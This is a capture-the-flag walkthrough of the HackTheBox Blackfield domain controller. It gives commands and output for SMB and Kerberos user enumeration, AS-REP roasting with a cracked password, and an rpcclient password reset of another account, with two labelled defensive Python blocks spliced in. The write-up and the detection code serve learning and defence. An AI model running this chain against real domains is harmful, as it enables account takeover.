Welcome back to another HackTheBox pentesting session; this time I am going to tackle the Blackfield box.

As always I start off with an Nmap scan!

sudo nmap -A -T4 10.10.10.192

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 18:16 CEST
Nmap scan report for 10.10.10.192
Host is up (0.051s latency).
Not shown: 994 filtered ports
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-10 23:21:30Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h04m14s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-10T23:21:51
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   50.28 ms 10.10.14.1
2   54.39 ms 10.10.10.192

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.54 seconds


I see a moderate list of open ports from the nmap scan. Let's try to enumerate with enum4linux.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ enum4linux -s /usr/share/enum4linux/share-list.txt 10.10.10.192
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jun 11 10:57:35 2020

[...]
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
c$ EXISTS
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
[...]
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
admin$ EXISTS
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
[...]
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
ipc$ EXISTS
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
[...]
enum4linux complete on Thu Jun 11 10:58:57 2020


Nothing in particular to highlight beyond a few shares, so let's go deeper.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ smbclient -L 10.10.10.192
Enter WORKGROUP\in7rud3r's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        profiles$       Disk      
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available


Two interesting additional shares: forensic and profiles$. The first one:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ smbclient //10.10.10.192/forensic
Enter WORKGROUP\in7rud3r's password: 
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> 


It doesn't seem useful... for now. Let's try the second one:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ smbclient //10.10.10.192/profiles$
Enter WORKGROUP\in7rud3r's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  3 18:47:12 2020
  ..                                  D        0  Wed Jun  3 18:47:12 2020
  AAlleni                             D        0  Wed Jun  3 18:47:11 2020
  ABarteski                           D        0  Wed Jun  3 18:47:11 2020
  ABekesz                             D        0  Wed Jun  3 18:47:11 2020
  ABenzies                            D        0  Wed Jun  3 18:47:11 2020
[...]
  ZScozzari                           D        0  Wed Jun  3 18:47:12 2020
  ZTimofeeff                          D        0  Wed Jun  3 18:47:12 2020
  ZWausik                             D        0  Wed Jun  3 18:47:12 2020

                7846143 blocks of size 4096. 3952597 blocks available


I show only part of the listing, but trust me, it's a really long list of users. Let's see whether there is anything interesting inside the folders.

smb: \> cd AAlleni
smb: \AAlleni\> ls
  .                                   D        0  Wed Jun  3 18:47:11 2020
  ..                                  D        0  Wed Jun  3 18:47:11 2020

                7846143 blocks of size 4096. 3952597 blocks available
smb: \AAlleni\> cd ..
smb: \> cd ABarteski
smb: \ABarteski\> ls
  .                                   D        0  Wed Jun  3 18:47:11 2020
  ..                                  D        0  Wed Jun  3 18:47:11 2020

                7846143 blocks of size 4096. 3952469 blocks available
smb: \ABarteski\>


They could all be empty. To be (fairly) sure that every folder is empty, I download the whole content of the share to my machine and check it:

smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
smb: \> 
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb$ find . -name "*" | grep "/.*/"


This last command lists every file name inside the folder, recursively; if anything were in the subfolders it would show up on the shell, but nothing appears, so the folders are all empty. Still, I have a big list of user names which I can turn into a file.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack$ cd smb/
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb$ cd ..
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack$ find ./smb/ -name "*" | cut -b 7- > user-list.txt


Now I need a list of passwords too; let's search the wordlists already available on the system.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack$ sudo find /usr/share/ -name "*password*.txt"
[sudo] password for in7rud3r: 
Swipe your right index finger across the fingerprint reader
/usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
/usr/share/metasploit-framework/data/wordlists/vnc_passwords.txt
/usr/share/cisco-torch/password.txt
/usr/share/setoolkit/htk-lite/commandinfo/password.txt
/usr/share/brutex/wordlists/vnc-default-passwords.txt
/usr/share/brutex/wordlists/password_weak.txt
/usr/share/brutex/wordlists/password_medium.txt
/usr/share/exploitdb-papers/papers/english/12914-mpi-and-password-cracking.txt
/usr/share/truecrack/most_common_password_10k.txt
/usr/share/doc/funkload/examples/demo/cmf/passwords.txt
/usr/share/commix/src/txt/passwords_john.txt


OK, let me say that I tried a brute-force attack, but after some time I understood that it would take far too long, so I decided on a simpler attack: trying each username as its own password.

msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > options 

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.192
rhosts => 10.10.10.192
msf5 auxiliary(scanner/smb/smb_login) > set user_as_pass true
user_as_pass => true
msf5 auxiliary(scanner/smb/smb_login) > set user_file ./user-list.txt
user_file => ./user-list.txt
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.192:445      - 10.10.10.192:445 - Starting SMB login bruteforce
[+] 10.10.10.192:445      - 10.10.10.192:445 - Success: '.\:' Guest
[-] 10.10.10.192:445      - 10.10.10.192:445 - Failed: '.\RVallandas:RVallandas',
[!] 10.10.10.192:445      - No active DB -- Credential data will not be saved!
[-] 10.10.10.192:445      - 10.10.10.192:445 - Failed: '.\APustulka:APustulka',
[...]
[-] 10.10.10.192:445      - 10.10.10.192:445 - Failed: '.\ATaueg:ATaueg',
[*] 10.10.10.192:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) >


But nothing was found. Since I'm already in the Metasploit Framework, I start searching for Kerberos modules.

msf5 auxiliary(scanner/smb/smb_login) > search kerberos

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  auxiliary/admin/kerberos/ms14_068_kerberos_checksum  2014-11-18       normal  No     MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
   1  auxiliary/gather/get_user_spns                       2014-09-27       normal  No     Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)
   2  auxiliary/gather/kerberos_enumusers                                   normal  No     Kerberos Domain User Enumeration
   3  auxiliary/scanner/winrm/winrm_login                                   normal  No     WinRM Login Utility
   4  post/windows/escalate/golden_ticket                                   normal  No     Windows Escalate Golden Ticket


This one could be interesting.

msf5 auxiliary(scanner/smb/smb_login) > info auxiliary/gather/kerberos_enumusers

       Name: Kerberos Domain User Enumeration
     Module: auxiliary/gather/kerberos_enumusers
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Matt Byrne <attackdebris@gmail.com>

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DOMAIN                      yes       The Domain Eg: demo.local
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      88               yes       The target port
  Timeout    10               yes       The TCP timeout to establish connection and read data
  USER_FILE                   yes       Files containing usernames, one per line

Description:
  This module will enumerate valid Domain Users via Kerberos from an 
  unauthenticated perspective. It utilizes the different responses 
  returned by the service for valid and invalid users.

References:
  https://nmap.org/nsedoc/scripts/krb5-enum-users.html


Let me try.

msf5 auxiliary(scanner/smb/smb_login) > use auxiliary/gather/kerberos_enumusers
msf5 auxiliary(gather/kerberos_enumusers) > set domain BLACKFIELD
domain => BLACKFIELD.htb
msf5 auxiliary(gather/kerberos_enumusers) > set rhosts 10.10.10.192
rhosts => 10.10.10.192
msf5 auxiliary(gather/kerberos_enumusers) > set user_file user-list.txt
user_file => user-list.txt
msf5 auxiliary(gather/kerberos_enumusers) > exploit
[*] Running module against 10.10.10.192

[*] Validating options...
[*] Using domain: BLACKFIELD...
[*] 10.10.10.192:88 - Testing User: "rvallandas"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "rvallandas" does not exist
[*] 10.10.10.192:88 - Testing User: "apustulka"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "apustulka" does not exist
[...]
[*] 10.10.10.192:88 - Testing User: "audit2020"...
[*] 10.10.10.192:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.192:88 - User: "audit2020" is present
[...]
[*] 10.10.10.192:88 - Testing User: "svc_backup"...
[*] 10.10.10.192:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.192:88 - User: "svc_backup" is present
[...]
[*] 10.10.10.192:88 - Testing User: "support"...
[-] Auxiliary failed: NoMethodError undefined method `error_code' for #<Rex::Proto::Kerberos::Model::KdcResponse:0x0000561b96b38438>
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:74:in `block in run'
[-]   /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `each'
[-]   /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `run'
[*] Auxiliary module execution completed


Well, I identify some real accounts on the machine, but the execution stops on the "support" user. Don't forget this: I extract the remaining users the module did not process and rerun it to complete our original list.

msf5 auxiliary(gather/kerberos_enumusers) > exploit
[*] Running module against 10.10.10.192

[*] Validating options...
[*] Using domain: BLACKFIELD...
[*] 10.10.10.192:88 - Testing User: "gmaroufkhani"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "gmaroufkhani" does not exist
[...]
[*] 10.10.10.192:88 - Testing User: "ataueg"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "ataueg" does not exist
[*] Auxiliary module execution completed


Well, two confirmed users (and one suspect): audit2020 and svc_backup. A brute-force attack should be much simpler now, so I go back to the previous module with only these users, but the process is too slow again. I have to search for a different way.

msf5 auxiliary(gather/kerberos_enumusers) > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS             10.10.10.192     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       true             no        Try the username as the password for all users
   USER_FILE          user-list.txt    no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/truecrack/most_common_password_10k.txt
pass_file => /usr/share/truecrack/most_common_password_10k.txt
msf5 auxiliary(scanner/smb/smb_login) > set user_file 
user_file => user-list.txt
msf5 auxiliary(scanner/smb/smb_login) > set user_file ''
user_file => 
msf5 auxiliary(scanner/smb/smb_login) > set smbUser audit2020
smbUser => audit2020
msf5 auxiliary(scanner/smb/smb_login) > set stop_on_success true
stop_on_success => true
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.192:445      - 10.10.10.192:445 - Starting SMB login bruteforce
[-] 10.10.10.192:445      - 10.10.10.192:445 - Failed: '.\audit2020:audit2020',
[!] 10.10.10.192:445      - No active DB -- Credential data will not be saved!
[-] 10.10.10.192:445      - 10.10.10.192:445 - Failed: '.\audit2020:password',
[...]


Another useful toolkit for Windows machines is Impacket; I have used it on many other HTB machines, and it has many tools that can help you "enumerate". I could use the smaller list with the three users (two confirmed and one suspect) identified in the previous step, but I want to be sure about every entry available to me, so I run the tool on the entire list and... surprise.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/impacket/examples$ ./GetNPUsers.py -dc-ip 10.10.10.192 BLACKFIELD/ -no-pass -usersfile ../../user-list.txt 
Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation

[-] invalid principal syntax
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$support@BLACKFIELD:7b456002ef8933746d6ce43ea72d7202$07cc3c311dd56116bd44ecac96cfc76d62bbbfa92a41c4579e7ddf08650e81b763eee96251f0e8b4c4c63f8f4dfc58a0cafbdda950912ee0f726247c0981232488fac2acc52179b6f1349e2baf1a5a7df442c0d22cfec12384133a9b88d585d33de25b157c39777f91f5245ae2738fe17ab386e0e313e55d0ccdad77e46093a93302631a7d8790295180d10d58bae24879b4650f20515a230a54547c17fbc5b9c55addc6caab793be4e0e3e202c006df39884a4afb13788eafe222a75563b6817501be4566ef3ea4bbf1ea4f2a9aa5f600c9e9a98f8480d1cca6f7ac94fd5e4c1d9afd11abac2a3e58259b245c2d
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)


As I understand it, this confirms the presence of the two users (audit2020 and svc_backup) and of the support user that caused the error in the Metasploit module; for support the tool returns an AS-REP hash, because that account does not require Kerberos pre-authentication (the UF_DONT_REQUIRE_PREAUTH flag the tool reports as missing for the others). OK, let's get the hash in hashcat format:
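The two Kerberos behaviours used above, the different KDC answers for unknown and known names, and a TGT handed out without pre-authentication, are both visible to the domain controller. The following is an added example, not code from the writeup, that runs detection logic over constructed Windows Security event 4768 records ("A Kerberos authentication ticket (TGT) was requested"); the field names are the ones that event carries, the sample events and the host names/addresses in them are constructed, and the threshold and window are assumptions to tune per environment.

```python
"""Detection of Kerberos user enumeration and of unauthenticated (AS-REP) TGT
requests over Security event 4768 records.  Added example, not from the writeup."""
from collections import defaultdict
from datetime import datetime, timedelta

STATUS_PRINCIPAL_UNKNOWN = "0x6"   # KDC_ERR_C_PRINCIPAL_UNKNOWN: the tested name does not exist
STATUS_PREAUTH_REQUIRED = "0x19"   # KDC_ERR_PREAUTH_REQUIRED: the account exists, pre-auth wanted
STATUS_OK = "0x0"
ETYPE_RC4_HMAC = "0x17"            # decimal 23, the "$23$" in the $krb5asrep$ line


def _ev(time, user, ip, status, preauth="-", etype="0xffffffff"):
    """Build one 4768 record; failures carry no pre-auth type or etype."""
    return {"time": time, "EventID": 4768, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth, "TicketEncryptionType": etype}


# Constructed sample, not real logs from the box: a user-list scan from one
# source, one TGT issued without pre-auth, and normal workstation noise.
SAMPLE_EVENTS = [
    _ev("2020-06-11T10:00:00", "rvallandas", "10.10.14.5", STATUS_PRINCIPAL_UNKNOWN),
    _ev("2020-06-11T10:00:01", "apustulka", "10.10.14.5", STATUS_PRINCIPAL_UNKNOWN),
    _ev("2020-06-11T10:00:02", "gmaroufkhani", "10.10.14.5", STATUS_PRINCIPAL_UNKNOWN),
    _ev("2020-06-11T10:00:03", "ataueg", "10.10.14.5", STATUS_PRINCIPAL_UNKNOWN),
    _ev("2020-06-11T10:00:04", "ztimofeeff", "10.10.14.5", STATUS_PRINCIPAL_UNKNOWN),
    _ev("2020-06-11T10:00:05", "audit2020", "10.10.14.5", STATUS_PREAUTH_REQUIRED),
    _ev("2020-06-11T10:00:06", "support", "10.10.14.5", STATUS_OK, preauth="0", etype=ETYPE_RC4_HMAC),
    _ev("2020-06-11T10:05:00", "jdoe", "10.10.20.7", STATUS_OK, preauth="2", etype="0x12"),  # hypothetical user, AES, PA-ENC-TIMESTAMP
    _ev("2020-06-11T10:06:00", "jdoe2", "10.10.20.7", STATUS_PRINCIPAL_UNKNOWN),            # a single typo, below threshold
]


def detect_user_enumeration(events, window=timedelta(seconds=60), threshold=5):
    """Return {ip: sorted distinct unknown names} for every source that produced
    `threshold` or more KDC_ERR_C_PRINCIPAL_UNKNOWN answers inside `window`.
    A real user never mistypes five different names in a minute; a list scan does."""
    by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4768 and e["Status"].lower() == STATUS_PRINCIPAL_UNKNOWN:
            by_ip[e["IpAddress"]].append((datetime.fromisoformat(e["time"]), e["TargetUserName"]))
    hits = {}
    for ip, items in by_ip.items():
        items.sort()
        start = 0
        for end in range(len(items)):            # sliding window over sorted timestamps
            while items[end][0] - items[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = sorted({name for _, name in items[start:end + 1]})
                break
    return hits


def detect_asrep_roasting(events):
    """TGTs issued with PreAuthType 0 (no pre-authentication) and RC4-HMAC
    encryption: exactly the artefact GetNPUsers.py returned for 'support'."""
    return [(e["IpAddress"], e["TargetUserName"]) for e in events
            if e["EventID"] == 4768 and e["Status"].lower() == STATUS_OK
            and e["PreAuthType"] == "0"
            and e["TicketEncryptionType"].lower() == ETYPE_RC4_HMAC]


if __name__ == "__main__":
    print("enumeration:", detect_user_enumeration(SAMPLE_EVENTS))
    print("asrep:", detect_asrep_roasting(SAMPLE_EVENTS))
```

Successful 4768 events with PreAuthType 0 are rare on a healthy domain, so that rule can fire on a single event, while the unknown-principal rule needs a burst to avoid alerting on typos; the fix on the directory side is to clear the "Do not require Kerberos preauthentication" flag on the account.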

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/impacket/examples$ ./GetNPUsers.py -format hashcat -dc-ip 10.10.10.192 BLACKFIELD/support -no-pass
Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for support
$krb5asrep$23$support@BLACKFIELD:fb60c0c7175cc8a20c23b981b97dc607$3ada2343cb0398525c6edbed97e176ba6f7216924bc97f745ea3d0dbc8b6aea5bdf18cb34c3106e7783584dc8bee0900fcee6980d57bbcdb1daaa2d61e593ec3befa8fe52c79de29dbca7a9ae959f816d383502054522ad3b72c796549231ed8c7731eaaccc8f10c2bb28a075a0aa8c1019bd128867db4dd222fc22b2271f419521c34d44d982d3ed9457b6d30b687fdad7eb2b856cd97c54dce354ea71073649dad5065db90544144d96cf726ae6b35dbb026693a41af5665631c77a04894377005ff8a82fe939d1dd16bb067cf779e166d76501072918f9879beb95c6d0ea4ce480da341b21f75858ae24287c6
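To make sense of what GetNPUsers.py returned, the following added example (not from the writeup or from Impacket) parses the `$krb5asrep$<etype>$<user>@<realm>:<checksum>$<cipher>` line into its parts and, on the directory side, audits which accounts carry the userAccountControl flag that makes such a hash obtainable. The hash line and the account list are constructed; the flag values are the documented userAccountControl constants.

```python
"""Parser for the $krb5asrep$ hash format and an AS-REP-roastable account audit.
Added example, not part of the writeup."""
import re

# Documented userAccountControl bits
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000   # the flag GetNPUsers.py reports as not set for audit2020

# Kerberos encryption types and how their key is derived from the password
ETYPE_INFO = {
    23: ("rc4-hmac", "key = NT hash (MD4 of the UTF-16LE password), no salt, no iterations"),
    17: ("aes128-cts-hmac-sha1-96", "key = PBKDF2-HMAC-SHA1, 4096 iterations, salted with realm and name"),
    18: ("aes256-cts-hmac-sha1-96", "key = PBKDF2-HMAC-SHA1, 4096 iterations, salted with realm and name"),
}

_ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]+)\$(?P<cipher>[0-9a-fA-F]+)$")


def parse_asrep_hash(line):
    """Split one hashcat-format AS-REP line into its fields.  For etype 23 the
    first 16 bytes of the enc-part are the HMAC-MD5 checksum and the rest is the
    RC4-encrypted data; cracking recomputes the checksum from each candidate."""
    m = _ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line")
    etype = int(m["etype"])
    checksum, cipher = m["checksum"], m["cipher"]
    if etype == 23 and len(checksum) != 32:
        raise ValueError("etype 23 checksum must be 16 bytes (HMAC-MD5)")
    name, key_derivation = ETYPE_INFO.get(etype, ("unknown", "unknown"))
    return {"etype": etype, "etype_name": name, "key_derivation": key_derivation,
            "user": m["user"], "realm": m["realm"],
            "checksum_bytes": len(checksum) // 2, "cipher_bytes": len(cipher) // 2}


def audit_preauth(accounts):
    """accounts: iterable of (sAMAccountName, userAccountControl).  Returns the
    enabled accounts that do not require pre-authentication, i.e. the ones for
    which an unauthenticated client can obtain an offline-crackable AS-REP."""
    return sorted(name for name, uac in accounts
                  if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE)


# Constructed sample line: same layout as the tool's output, placeholder bytes.
SAMPLE_LINE = "$krb5asrep$23$support@BLACKFIELD:" + "ab" * 16 + "$" + "cd" * 64

# Constructed userAccountControl values, not read from the box.
SAMPLE_ACCOUNTS = [
    ("audit2020", UF_NORMAL_ACCOUNT),
    ("svc_backup", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD),
    ("support", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH),
    ("olduser", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE),  # hypothetical disabled account
]

if __name__ == "__main__":
    print(parse_asrep_hash(SAMPLE_LINE))
    print("roastable:", audit_preauth(SAMPLE_ACCOUNTS))
```

The etype matters for the defender as much as the flag: with etype 23 the key is the raw NT hash, which is why John reports hundreds of thousands of candidates per second on the page, whereas AES etypes cost 4096 PBKDF2 iterations per guess. In a real directory the same audit is one LDAP query using the bitwise AND matching rule, `(userAccountControl:1.2.840.113556.1.4.803:=4194304)`, where 4194304 is 0x400000.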


And use John the Ripper to crack the hash:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ john --wordlist=/usr/share/wordlists/rockyou.txt support.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD)
1g 0:00:01:02 DONE (2020-06-16 11:50) 0.01609g/s 230762p/s 230762c/s 230762C/s #00p3r..#+*=%
Use the "--show" option to display all of the cracked passwords reliably
Session completed


Nice, the password of the support user seems to be "#00^BlackKnight". I try the credential, and the only way I can connect with it is the rpcclient command:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ rpcclient -U BLACKFIELD\\support 10.10.10.192
Enter BLACKFIELD\support's password: 
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
[...]
user:[BLACKFIELD438814] rid:[0x584]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]


The next step is to look for a way to exploit this access through rpcclient; searching on the internet:

Infrastructure PenTest Series : Part 3 - Exploitation — tech.bitvijays.com


I can change the password of other users; good, I have to try again. On the remote machine:

rpcclient $> setuserinfo2 audit2020 23 'ASDqwe123'


It seems we are lucky today. And on the local machine:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ net rpc password audit2020 -U support -S 10.10.10.192
